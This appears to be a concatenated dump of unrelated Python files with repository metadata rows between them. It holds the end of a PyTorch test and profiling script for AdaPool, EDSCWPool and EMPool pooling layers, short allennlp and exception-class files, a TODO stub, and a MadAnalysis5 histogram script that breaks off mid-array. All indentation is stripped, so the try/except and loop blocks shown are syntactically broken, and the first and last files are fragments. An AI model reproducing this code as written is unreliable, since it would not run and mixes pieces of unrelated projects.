p_2d = AdaPool2d(dtype=x_2d.dtype,device=x_2d.get_device(),beta=beta_2d)
pool_2d = p_2d(x_2d)
p_2d = EDSCWPool2d()
pool_2d = p_2d(x_2d)
p_2d = EMPool2d()
pool_2d = p_2d(x_2d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 3D ...' + '\033[0m')
try:
p_3d = AdaPool3d(dtype=x_3d.dtype,device=x_3d.get_device(),beta=beta_3d)
pool_3d = p_3d(x_3d)
p_3d = EDSCWPool3d()
pool_3d = p_3d(x_3d)
p_3d = EMPool3d()
pool_3d = p_3d(x_3d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
x_1d.requires_grad = True
x_2d.requires_grad = True
x_3d.requires_grad = True
print('\033[38;2;77;216;173m' + '--- Performing checks for backward ---' + '\033[0m')
print('\033[38;2;199;246;236m' + '> Checking 1D ...' + '\033[0m')
try:
p_1d = AdaPool1d(dtype=x_1d.dtype,device=x_1d.get_device(),beta=beta_1d)
p_1d(x_1d).pow(2).mean().backward()
p_1d = EDSCWPool1d()
p_1d(x_1d).pow(2).mean().backward()
p_1d = EMPool1d()
p_1d(x_1d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 2D ...' + '\033[0m')
try:
p_2d = AdaPool2d(dtype=x_2d.dtype,device=x_2d.get_device(),beta=beta_2d)
p_2d(x_2d).pow(2).mean().backward()
p_2d = EDSCWPool2d()
p_2d(x_2d).pow(2).mean().backward()
p_2d = EMPool2d()
p_2d(x_2d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 3D ...' + '\033[0m')
try:
p_3d = AdaPool3d(dtype=x_3d.dtype,device=x_3d.get_device(),beta=beta_3d)
p_3d(x_3d).pow(2).mean().backward()
p_3d = EDSCWPool3d()
p_3d(x_3d).pow(2).mean().backward()
p_3d = EMPool3d()
p_3d(x_3d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;50;50;50;48;2;85;217;192m' + ' = = = Checks for float32 = = = ' + '\033[0m')
x_1d = torch.rand((4, 16, 56), device='cuda:0').float()
beta_1d = (28)
x_2d = torch.rand((4, 16, 56, 56), device='cuda:0').float()
beta_2d = (28,28)
x_3d = torch.rand((4, 16, 4, 56, 56), device='cuda:0').float()
beta_3d = (2,28,28)
print('\033[38;2;77;216;173m' + '--- Performing checks for forward ---' + '\033[0m')
print('\033[38;2;199;246;236m' + '> Checking 1D ...' + '\033[0m')
try:
p_1d = AdaPool1d(dtype=x_1d.dtype,device=x_1d.get_device(),beta=beta_1d)
pool_1d = p_1d(x_1d)
p_1d = EDSCWPool1d()
pool_1d = p_1d(x_1d)
p_1d = EMPool1d()
pool_1d = p_1d(x_1d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 2D ...' + '\033[0m')
try:
p_2d = AdaPool2d(dtype=x_2d.dtype,device=x_2d.get_device(),beta=beta_2d)
pool_2d = p_2d(x_2d)
p_2d = EDSCWPool2d()
pool_2d = p_2d(x_2d)
p_2d = EMPool2d()
pool_2d = p_2d(x_2d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 3D ...' + '\033[0m')
try:
p_3d = AdaPool3d(dtype=x_3d.dtype,device=x_3d.get_device(),beta=beta_3d)
pool_3d = p_3d(x_3d)
p_3d = EDSCWPool3d()
pool_3d = p_3d(x_3d)
p_3d = EMPool3d()
pool_3d = p_3d(x_3d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
x_1d.requires_grad = True
x_2d.requires_grad = True
x_3d.requires_grad = True
print('\033[38;2;77;216;173m' + '--- Performing checks for backward ---' + '\033[0m')
print('\033[38;2;199;246;236m' + '> Checking 1D ...' + '\033[0m')
try:
p_1d = AdaPool1d(dtype=x_1d.dtype,device=x_1d.get_device(),beta=beta_1d)
p_1d(x_1d).pow(2).mean().backward()
p_1d = EDSCWPool1d()
p_1d(x_1d).pow(2).mean().backward()
p_1d = EMPool1d()
p_1d(x_1d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 2D ...' + '\033[0m')
try:
p_2d = AdaPool2d(dtype=x_2d.dtype,device=x_2d.get_device(),beta=beta_2d)
p_2d(x_2d).pow(2).mean().backward()
p_2d = EDSCWPool2d()
p_2d(x_2d).pow(2).mean().backward()
p_2d = EMPool2d()
p_2d(x_2d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 3D ...' + '\033[0m')
try:
p_3d = AdaPool3d(dtype=x_3d.dtype,device=x_3d.get_device(),beta=beta_3d)
p_3d(x_3d).pow(2).mean().backward()
p_3d = EDSCWPool3d()
p_3d(x_3d).pow(2).mean().backward()
p_3d = EMPool3d()
p_3d(x_3d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;50;50;50;48;2;85;217;192m' + ' = = = Checks for float64 = = = ' + '\033[0m')
x_1d = torch.rand((4, 16, 56), device='cuda:0').double()
beta_1d = (28)
x_2d = torch.rand((4, 16, 56, 56), device='cuda:0').double()
beta_2d = (28,28)
x_3d = torch.rand((4, 16, 4, 56, 56), device='cuda:0').double()
beta_3d = (2,28,28)
print('\033[38;2;77;216;173m' + '--- Performing checks for forward ---' + '\033[0m')
print('\033[38;2;199;246;236m' + '> Checking 1D ...' + '\033[0m')
try:
p_1d = AdaPool1d(dtype=x_1d.dtype,device=x_1d.get_device(),beta=beta_1d)
pool_1d = p_1d(x_1d)
p_1d = EDSCWPool1d()
pool_1d = p_1d(x_1d)
p_1d = EMPool1d()
pool_1d = p_1d(x_1d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 2D ...' + '\033[0m')
try:
p_2d = AdaPool2d(dtype=x_2d.dtype,device=x_2d.get_device(),beta=beta_2d)
pool_2d = p_2d(x_2d)
p_2d = EDSCWPool2d()
pool_2d = p_2d(x_2d)
p_2d = EMPool2d()
pool_2d = p_2d(x_2d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 3D ...' + '\033[0m')
try:
p_3d = AdaPool3d(dtype=x_3d.dtype,device=x_3d.get_device(),beta=beta_3d)
pool_3d = p_3d(x_3d)
p_3d = EDSCWPool3d()
pool_3d = p_3d(x_3d)
p_3d = EMPool3d()
pool_3d = p_3d(x_3d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
x_1d.requires_grad = True
x_2d.requires_grad = True
x_3d.requires_grad = True
print('\033[38;2;77;216;173m' + '--- Performing checks for backward ---' + '\033[0m')
print('\033[38;2;199;246;236m' + '> Checking 1D ...' + '\033[0m')
try:
p_1d = AdaPool1d(dtype=x_1d.dtype,device=x_1d.get_device(),beta=beta_1d)
p_1d(x_1d).pow(2).mean().backward()
p_1d = EDSCWPool1d()
p_1d(x_1d).pow(2).mean().backward()
p_1d = EMPool1d()
p_1d(x_1d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 2D ...' + '\033[0m')
try:
p_2d = AdaPool2d(dtype=x_2d.dtype,device=x_2d.get_device(),beta=beta_2d)
p_2d(x_2d).pow(2).mean().backward()
p_2d = EDSCWPool2d()
p_2d(x_2d).pow(2).mean().backward()
p_2d = EMPool2d()
p_2d(x_2d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 3D ...' + '\033[0m')
try:
p_3d = AdaPool3d(dtype=x_3d.dtype,device=x_3d.get_device(),beta=beta_3d)
p_3d(x_3d).pow(2).mean().backward()
p_3d = EDSCWPool3d()
p_3d(x_3d).pow(2).mean().backward()
p_3d = EMPool3d()
p_3d(x_3d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;50;50;50;48;2;85;217;192m' + ' = = = Checks for Unpool (float32) = = = ' + '\033[0m')
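# With return_mask=True each pooling layer also returns the mask it used while
# pooling; adaunpool takes the pooled output together with that mask, and the
# unpooling call is profiled below over 100 iterations per dimensionality.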
x_1d = torch.rand((4, 16, 40), device='cuda:0').float()
x_2d = torch.rand((4, 16, 40, 40), device='cuda:0').float()
x_3d = torch.rand((4, 16, 4, 40, 40), device='cuda:0').float()
x_1d.requires_grad = True
x_2d.requires_grad = True
x_3d.requires_grad = True
beta_1d = (20)
beta_2d = (20,20)
beta_3d = (2,20,20)
p_1d = AdaPool1d(return_mask=True, dtype=x_1d.dtype,device=x_1d.get_device(),beta=beta_1d)
p_2d = AdaPool2d(return_mask=True, dtype=x_2d.dtype,device=x_2d.get_device(),beta=beta_2d)
p_3d = AdaPool3d(return_mask=True, dtype=x_3d.dtype,device=x_3d.get_device(),beta=beta_3d)
tmp, mask = p_1d(x_1d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
adaunpool(tmp, mask)
print('\033[38;2;199;246;236m' +'AdaUnpool1d'+ '\033[0m')
print('\033[92m' + '> PASSED' + '\033[0m')
print(prof.key_averages())
try:
tmp, mask = p_2d(x_2d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
adaunpool(tmp, mask)
print('\033[38;2;199;246;236m' +'AdaUnpool2d'+ '\033[0m')
print('\033[92m' + '> PASSED' + '\033[0m')
print(prof.key_averages())
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
try:
tmp, mask = p_3d(x_3d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
adaunpool(tmp, mask)
print('\033[38;2;199;246;236m' +'AdaUnpool3d'+ '\033[0m')
print('\033[92m' + '> PASSED' + '\033[0m')
print(prof.key_averages())
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\n'+'\033[38;2;50;50;50;48;2;199;246;236m' + '--- Floating-point precision Forward/Backward tests completed ---' + '\033[0m'+'\n')
print('\033[38;2;50;50;50;48;2;85;217;192m' + '= = = Profiling checks = = =' + '\033[0m')
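# Each pooling variant below is run for 100 iterations inside
# torch.autograd.profiler.profile(use_cuda=True); prof.key_averages() prints the
# per-op summary, and the last three lines of str(prof) (the overall totals) are
# saved for the timing comparison printed at the end of the script.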
x_1d = torch.rand((4, 16, 80), device='cuda:0').float()
x_2d = torch.rand((4, 16, 80, 80), device='cuda:0').float()
x_3d = torch.rand((4, 16, 8, 80, 80), device='cuda:0').float()
x_1d.requires_grad = True
x_2d.requires_grad = True
x_3d.requires_grad = True
beta_1d = (40)
beta_2d = (40,40)
beta_3d = (4,40,40)
p_1d = AdaPool1d(dtype=x_1d.dtype,device=x_1d.get_device(), beta=beta_1d)
p_2d = AdaPool2d(dtype=x_2d.dtype,device=x_2d.get_device(), beta=beta_2d)
p_3d = AdaPool3d(dtype=x_3d.dtype,device=x_3d.get_device(), beta=beta_3d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_1d(x_1d)
print('\033[38;2;199;246;236m' +'AdaPool1d [forward]'+ '\033[0m')
print(prof.key_averages())
time_f_1d_cuda = ''.join(str(prof).split('\n')[-3:])
_tt = p_1d(x_1d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
tmp = p_1d(x_1d)
tmp.backward(tmp,retain_graph=True)
print('\033[38;2;199;246;236m' +'AdaPool1d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_1d_cuda = ' '.join(str(prof).split('\n')[-3:])
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_2d(x_2d)
print('\033[38;2;199;246;236m' +'AdaPool2d [forward]'+ '\033[0m')
time_f_2d_cuda = ''.join(str(prof).split('\n')[-3:])
print(prof.key_averages())
_tt = p_2d(x_2d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
tmp = p_2d(x_2d)
tmp.backward(tmp,retain_graph=True)
print('\033[38;2;199;246;236m' +'AdaPool2d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_2d_cuda = ' '.join(str(prof).split('\n')[-3:])
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_3d(x_3d)
print('\033[38;2;199;246;236m' +'AdaPool3d [forward]'+ '\033[0m')
print(prof.key_averages())
time_f_3d_cuda = ''.join(str(prof).split('\n')[-3:])
_tt = p_3d(x_3d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_3d(x_3d).backward(_tt)
print('\033[38;2;199;246;236m' +'AdaPool3d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_3d_cuda = ' '.join(str(prof).split('\n')[-3:])
p_1d = EDSCWPool1d()
p_2d = EDSCWPool2d()
p_3d = EDSCWPool3d()
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_1d(x_1d)
print('\033[38;2;199;246;236m' +'EDSCWPool1d [forward]'+ '\033[0m')
print(prof.key_averages())
time_f_1d_cuda_EDSCW = ''.join(str(prof).split('\n')[-3:])
_tt = p_1d(x_1d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
tmp = p_1d(x_1d)
tmp.backward(tmp,retain_graph=True)
print('\033[38;2;199;246;236m' +'EDSCWPool1d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_1d_cuda_EDSCW = ' '.join(str(prof).split('\n')[-3:])
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_2d(x_2d)
print('\033[38;2;199;246;236m' +'EDSCWPool2d [forward]'+ '\033[0m')
time_f_2d_cuda_EDSCW = ''.join(str(prof).split('\n')[-3:])
print(prof.key_averages())
_tt = p_2d(x_2d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
tmp = p_2d(x_2d)
tmp.backward(tmp,retain_graph=True)
print('\033[38;2;199;246;236m' +'EDSCWPool2d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_2d_cuda_EDSCW = ' '.join(str(prof).split('\n')[-3:])
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_3d(x_3d)
print('\033[38;2;199;246;236m' +'EDSCWPool3d [forward]'+ '\033[0m')
print(prof.key_averages())
time_f_3d_cuda_EDSCW = ''.join(str(prof).split('\n')[-3:])
_tt = p_3d(x_3d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_3d(x_3d).backward(_tt)
print('\033[38;2;199;246;236m' +'EDSCWPool3d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_3d_cuda_EDSCW = ' '.join(str(prof).split('\n')[-3:])
p_1d = EMPool1d()
p_2d = EMPool2d()
p_3d = EMPool3d()
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_1d(x_1d)
print('\033[38;2;199;246;236m' +'EMPool1d [forward]'+ '\033[0m')
print(prof.key_averages())
time_f_1d_cuda_em = ''.join(str(prof).split('\n')[-3:])
_tt = p_1d(x_1d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
tmp = p_1d(x_1d)
tmp.backward(tmp,retain_graph=True)
print('\033[38;2;199;246;236m' +'EMPool1d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_1d_cuda_em = ' '.join(str(prof).split('\n')[-3:])
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_2d(x_2d)
print('\033[38;2;199;246;236m' +'EMPool2d [forward]'+ '\033[0m')
time_f_2d_cuda_em = ''.join(str(prof).split('\n')[-3:])
print(prof.key_averages())
_tt = p_2d(x_2d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
tmp = p_2d(x_2d)
tmp.backward(tmp,retain_graph=True)
print('\033[38;2;199;246;236m' +'EMPool2d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_2d_cuda_em = ' '.join(str(prof).split('\n')[-3:])
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_3d(x_3d)
print('\033[38;2;199;246;236m' +'EMPool3d [forward]'+ '\033[0m')
print(prof.key_averages())
time_f_3d_cuda_em = ''.join(str(prof).split('\n')[-3:])
_tt = p_3d(x_3d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_3d(x_3d).backward(_tt)
print('\033[38;2;199;246;236m' +'EMPool3d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_3d_cuda_em = ' '.join(str(prof).split('\n')[-3:])
print('\n'+'\033[38;2;199;246;236m' +'-------------------------------'+ '\033[0m')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'AdaPool1d [forward + backward]'+ '\033[0m')
print(time_b_1d_cuda, 'for 100 iterations.')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'EDSCWPool1d [forward + backward]'+ '\033[0m')
print(time_b_1d_cuda_EDSCW, 'for 100 iterations.')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'EMPool1d [forward + backward]'+ '\033[0m')
print(time_b_1d_cuda_em, 'for 100 iterations.')
print('\n'+'\033[38;2;199;246;236m' +'-------------------------------'+ '\033[0m')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'AdaPool2d [forward + backward]'+ '\033[0m')
print(time_b_2d_cuda, 'for 100 iterations.')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'EDSCWPool2d [forward + backward]'+ '\033[0m')
print(time_b_2d_cuda_EDSCW, 'for 100 iterations.')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'EMPool2d [forward + backward]'+ '\033[0m')
print(time_b_2d_cuda_em, 'for 100 iterations.')
print('\n'+'\033[38;2;199;246;236m' +'-------------------------------'+ '\033[0m')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'AdaPool3d [forward + backward]'+ '\033[0m')
print(time_b_3d_cuda, 'for 100 iterations.')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'EDSCWPool3d [forward + backward]'+ '\033[0m')
print(time_b_3d_cuda_EDSCW, 'for 100 iterations.')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'EMPool3d [forward + backward]'+ '\033[0m')
print(time_b_3d_cuda_em, 'for 100 iterations.')
print('\n'+'\033[38;2;199;246;236m' +'-------------------------------'+ '\033[0m')
print('\n'+'\033[38;2;50;50;50;48;2;199;246;236m' + '--- Tests finished ---' + '\033[0m')
63cbcf94a58a06f34321ece996f3e30ea9cbcaa6 | 92 | py | Python
| allennlp_series/common/__init__.py | harsh19/TRUCE | fb9fae76f87d007d0590b21a4de3739c860ba516 | ["MIT"] | 1 | 2021-11-16T02:03:28.000Z | 2021-11-16T02:03:28.000Z
| allennlp_series/common/__init__.py | harsh19/TRUCE | fb9fae76f87d007d0590b21a4de3739c860ba516 | ["MIT"] | null | null | null
| allennlp_series/common/__init__.py | harsh19/TRUCE | fb9fae76f87d007d0590b21a4de3739c860ba516 | ["MIT"] | null | null | null |
from allennlp_series.common.testing import *
from allennlp_series.common.constants import *
63d0f44085251b1bc775d95c62e52f06502a12b5 | 163 | py | Python
| flowmancer/typedefs/exceptions.py | sando-io/flowmancer | 34e6679651b00c1e8c78e211cac493708ce9b1b7 | ["MIT"] | null | null | null
| flowmancer/typedefs/exceptions.py | sando-io/flowmancer | 34e6679651b00c1e8c78e211cac493708ce9b1b7 | ["MIT"] | 21 | 2022-01-07T03:14:34.000Z | 2022-01-22T22:32:20.000Z
| flowmancer/typedefs/exceptions.py | natsunlee/flowmancer | 34e6679651b00c1e8c78e211cac493708ce9b1b7 | ["MIT"] | null | null | null |
class ExistingTaskName(Exception): pass
class DuplicateDependency(Exception): pass
class ExecutorDoesNotExist(Exception): pass
class MissingJobDef(Exception): pass
89302960a6a2c173b2c54e5ab9dbb0bca4dcde00 | 25 | py | Python
| imaprt_api/imaprt_api/models/drawer/blend_bit.py | pei223/imaprt | 473bf0f46c9ee0ef535f6b341e94eb5be9cb9172 | ["MIT"] | null | null | null
| imaprt_api/imaprt_api/models/drawer/blend_bit.py | pei223/imaprt | 473bf0f46c9ee0ef535f6b341e94eb5be9cb9172 | ["MIT"] | 7 | 2021-03-10T22:40:15.000Z | 2022-02-27T06:51:48.000Z
| imaprt_api/imaprt_api/models/drawer/blend_bit.py | pei223/imaprt | 473bf0f46c9ee0ef535f6b341e94eb5be9cb9172 | ["MIT"] | null | null | null |
# TODO alpha-blend the binary image with the original image
8965c186126184078d2afd8adaaa3b8dae9f9bff | 61,322 | py | Python
| optimization/second_sdEta_mjj_optimization/lumi_and_kin_plots/four_cuts_lum150/Output/Histos/MadAnalysis5job_0/selection_10.py | sheride/axion_pheno | 7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5 | ["MIT"] | null | null | null
| optimization/second_sdEta_mjj_optimization/lumi_and_kin_plots/four_cuts_lum150/Output/Histos/MadAnalysis5job_0/selection_10.py | sheride/axion_pheno | 7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5 | ["MIT"] | null | null | null
| optimization/second_sdEta_mjj_optimization/lumi_and_kin_plots/four_cuts_lum150/Output/Histos/MadAnalysis5job_0/selection_10.py | sheride/axion_pheno | 7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5 | ["MIT"] | null | null | null |
def selection_10():
# Library import
import numpy
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
# Library version
matplotlib_version = matplotlib.__version__
numpy_version = numpy.__version__
# Histo binning
xBinning = numpy.linspace(0.0,4000.0,401,endpoint=True)
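# 401 evenly spaced edges over [0.0, 4000.0] give 400 uniform bins of width 10.0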
# Creating data sequence: middle of each bin
xData = numpy.array([5.0,15.0,25.0,35.0,45.0,55.0,65.0,75.0,85.0,95.0,105.0,115.0,125.0,135.0,145.0,155.0,165.0,175.0,185.0,195.0,205.0,215.0,225.0,235.0,245.0,255.0,265.0,275.0,285.0,295.0,305.0,315.0,325.0,335.0,345.0,355.0,365.0,375.0,385.0,395.0,405.0,415.0,425.0,435.0,445.0,455.0,465.0,475.0,485.0,495.0,505.0,515.0,525.0,535.0,545.0,555.0,565.0,575.0,585.0,595.0,605.0,615.0,625.0,635.0,645.0,655.0,665.0,675.0,685.0,695.0,705.0,715.0,725.0,735.0,745.0,755.0,765.0,775.0,785.0,795.0,805.0,815.0,825.0,835.0,845.0,855.0,865.0,875.0,885.0,895.0,905.0,915.0,925.0,935.0,945.0,955.0,965.0,975.0,985.0,995.0,1005.0,1015.0,1025.0,1035.0,1045.0,1055.0,1065.0,1075.0,1085.0,1095.0,1105.0,1115.0,1125.0,1135.0,1145.0,1155.0,1165.0,1175.0,1185.0,1195.0,1205.0,1215.0,1225.0,1235.0,1245.0,1255.0,1265.0,1275.0,1285.0,1295.0,1305.0,1315.0,1325.0,1335.0,1345.0,1355.0,1365.0,1375.0,1385.0,1395.0,1405.0,1415.0,1425.0,1435.0,1445.0,1455.0,1465.0,1475.0,1485.0,1495.0,1505.0,1515.0,1525.0,1535.0,1545.0,1555.0,1565.0,1575.0,1585.0,1595.0,1605.0,1615.0,1625.0,1635.0,1645.0,1655.0,1665.0,1675.0,1685.0,1695.0,1705.0,1715.0,1725.0,1735.0,1745.0,1755.0,1765.0,1775.0,1785.0,1795.0,1805.0,1815.0,1825.0,1835.0,1845.0,1855.0,1865.0,1875.0,1885.0,1895.0,1905.0,1915.0,1925.0,1935.0,1945.0,1955.0,1965.0,1975.0,1985.0,1995.0,2005.0,2015.0,2025.0,2035.0,2045.0,2055.0,2065.0,2075.0,2085.0,2095.0,2105.0,2115.0,2125.0,2135.0,2145.0,2155.0,2165.0,2175.0,2185.0,2195.0,2205.0,2215.0,2225.0,2235.0,2245.0,2255.0,2265.0,2275.0,2285.0,2295.0,2305.0,2315.0,2325.0,2335.0,2345.0,2355.0,2365.0,2375.0,2385.0,2395.0,2405.0,2415.0,2425.0,2435.0,2445.0,2455.0,2465.0,2475.0,2485.0,2495.0,2505.0,2515.0,2525.0,2535.0,2545.0,2555.0,2565.0,2575.0,2585.0,2595.0,2605.0,2615.0,2625.0,2635.0,2645.0,2655.0,2665.0,2675.0,2685.0,2695.0,2705.0,2715.0,2725.0,2735.0,2745.0,2755.0,2765.0,2775.0,2785.0,2795.0,2805.0,2815.0,2825.0,2835.0,2845.0,2855.0,2865.0,2875.0,2885.0,2895.0,2905.0,2915.0,2925.0,2935.0,2945.0,2955.0,2965.0,2975.0,2985.0,2995.0,3005.0,3015.0,3025.0,3035.0,3045.0,3055.0,3065.0,3075.0,3085.0,3095.0,3105.0,3115.0,3125.0,3135.0,3145.0,3155.0,3165.0,3175.0,3185.0,3195.0,3205.0,3215.0,3225.0,3235.0,3245.0,3255.0,3265.0,3275.0,3285.0,3295.0,3305.0,3315.0,3325.0,3335.0,3345.0,3355.0,3365.0,3375.0,3385.0,3395.0,3405.0,3415.0,3425.0,3435.0,3445.0,3455.0,3465.0,3475.0,3485.0,3495.0,3505.0,3515.0,3525.0,3535.0,3545.0,3555.0,3565.0,3575.0,3585.0,3595.0,3605.0,3615.0,3625.0,3635.0,3645.0,3655.0,3665.0,3675.0,3685.0,3695.0,3705.0,3715.0,3725.0,3735.0,3745.0,3755.0,3765.0,3775.0,3785.0,3795.0,3805.0,3815.0,3825.0,3835.0,3845.0,3855.0,3865.0,3875.0,3885.0,3895.0,3905.0,3915.0,3925.0,3935.0,3945.0,3955.0,3965.0,3975.0,3985.0,3995.0])
# Creating weights for histo: y11_M_0
y11_M_0_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,20.2043081043,19.789783451,20.0661282199,20.4653078861,20.9719474624,21.601406936,21.7242268333,22.2155214225,22.7682259603,23.6586852156,23.8275700744,23.5358653183,23.0599307163,25.9616032898,24.7333893169,24.9943890987,23.6433402285,25.9308983155,25.5317336493,25.7773734439,24.5337994838,24.6259144068,25.593143598,23.4590953825,23.7047501771,24.2881596892,23.6740452028,23.7200951643,22.8142759218,23.7815051129,22.9831607805,22.8296359089,23.6433402285,22.8910458576,23.1059806778,23.2902255238,21.4478820644,22.7068160116,21.6781768718,22.2462263968,21.9545216407,22.5379311529,22.7682259603,21.1561773083,22.3844062812,21.509292013,22.0159315894,20.6802427063,20.4346029117,20.2350130786,21.0947673597,20.2043081043,19.9433083226,19.5901936179,19.8511933996,19.5901936179,20.2810630401,18.9760791314,18.8839642084,18.1470298247,16.9495058261,18.0088499403,18.3466196578,18.0856198761,17.3947354538,17.4868503768,18.3466196578,18.3466196578,16.1511614937,15.7826868019,16.0743915579,17.1337356721,15.890161712,15.030407431,15.3067521999,15.3681621485,15.3835221357,14.8768780593,15.6598669046,14.9075830337,15.8594567377,14.6465862519,13.9557093297,13.9096503682,14.2167076114,14.0171207783,14.2320600986,13.7254175222,13.986414304,13.7714749837,14.2474125857,12.7735423182,12.6660719081,12.3283111906,12.5125440365,12.7581898311,13.0959520486,12.8042472926,11.9598424987,11.8677260757,12.0980178831,11.4685524095,11.5606703325,11.4378474352,11.5913753068,11.3917884737,11.1000852176,11.0079687947,11.0693802433,11.0079687947,10.7623230001,11.1461441791,10.3631508339,10.0560935907,10.086800065,9.87186074474,10.1175050393,10.3785033211,10.3170918724,8.67434124616,9.85650675758,9.27310024545,8.72039870764,8.99674947655,8.67434124616,9.30380671977,9.19633630964,8.13699219551,8.36728400293,8.